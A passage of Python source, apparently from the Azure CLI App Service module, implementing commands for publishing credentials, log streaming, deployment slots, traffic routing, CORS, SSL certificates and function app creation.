return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
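# Each converted profile is a flat dict of the XML attributes; typical keys include
# 'profileName', 'publishMethod', 'publishUrl', 'userName' and 'userPWD' (the exact keys
# depend on the publish profile XML returned by the service).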
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
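# Illustrative return value when DOCKER_ENABLE_CI is 'true' (URL host is hypothetical):
#   {'DOCKER_ENABLE_CI': True, 'CI_CD_URL': 'https://myapp.scm.azurewebsites.net/docker/hook'}
# When CI is disabled, only the DOCKER_ENABLE_CI flag is returned.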
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size, 3-day retention. Hard-coded here because the portal does the same
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
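# Each --distribution entry has the form '<slot>=<percentage>', e.g. 'staging=25' routes 25% of
# production traffic to the 'staging' slot host (the slot name here is a hypothetical example).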
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode()/decode() for stdout encodings that do not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
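# Example of a generated certificate name (all parts are hypothetical):
#   '<thumbprint>_myase_westus2_my-rg', i.e. thumbprint_hostingEnvironment_location_resourceGroup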
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
    with open(certificate_file, 'rb') as cert_file:
        p12 = OpenSSL.crypto.load_pkcs12(cert_file.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = _format_key_vault_id(cmd.cli_ctx, key_vault, resource_group_name)
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
        raise CLIError('Managed Certificates are not supported on the Free and Shared tiers.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
    # the goal is to match '*.foo.com' with host names like 'admin.foo.com', 'logs.foo.com', etc.
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
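# Example of the wildcard matching above: a cert issued for '*.contoso.com' matches webapp
# host names 'www.contoso.com' and 'admin.contoso.com', but not the apex 'contoso.com'
# (host names are hypothetical).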
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
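# Illustrative entries produced by _load_stacks (version strings are examples, not exhaustive):
# every entry gets a 'setter' callable; Windows entries additionally carry a 'configs' mapping, e.g.
#   {'displayName': 'php|7.2', 'configs': {'php_version': '7.2'}, 'setter': _StackRuntimeHelper.update_site_config}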
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
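# Example usage of the validators above (flag name and bounds are illustrative):
#   validate_range_of_int_flag('--max-burst', '10', min_val=0, max_val=20)  # returns 10
#   validate_range_of_int_flag('--max-burst', '42', min_val=0, max_val=20)  # raises CLIError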
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
if not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
if runtime_version is not None:
if runtime is None:
raise CLIError('Must specify --runtime to use --runtime-version')
allowed_versions = FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS[functions_version][runtime]
if runtime_version not in allowed_versions:
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
                           '--functions-version {}. Supported versions are: {}'
.format(runtime_version, runtime, functions_version, ', '.join(allowed_versions)))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if runtime not in FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS[functions_version]:
raise CLIError("An appropriate linux image for runtime:'{}', "
"functions_version: '{}' was not found".format(runtime, functions_version))
if deployment_container_image_name is None:
site_config.linux_fx_version = _get_linux_fx_functionapp(functions_version, runtime, runtime_version)
else:
functionapp_def.kind = 'functionapp'
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION',
value=_get_website_node_version_functionapp(functions_version,
runtime,
runtime_version)))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
return functionapp
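# Illustrative usage (a sketch with hypothetical resource names, not part of the original module;
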